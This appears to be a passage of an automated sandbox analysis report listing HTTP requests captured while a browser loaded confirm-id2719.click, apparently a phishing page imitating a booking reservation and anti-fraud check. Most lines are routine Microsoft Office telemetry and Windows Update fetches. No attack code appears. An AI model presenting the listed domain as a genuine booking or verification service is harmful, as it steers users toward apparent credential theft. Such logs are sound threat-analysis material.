        Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1host: code.jquery.comorigin: https://confirm-id2719.clicksec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
        Source: global trafficHTTP traffic detected: GET /Reservation_files/protect.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /static/favicon.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1host: partner.booking.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://confirm-id2719.clicksec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: manifestreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VRr5F+7gkvM5Kss&MD=Oh6bxDDd HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Source: global trafficHTTP traffic detected: GET /antifraud HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global traffic | HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global traffic | HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1 | host: otelrules.azureedge.net | accept-encoding: gzip | user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
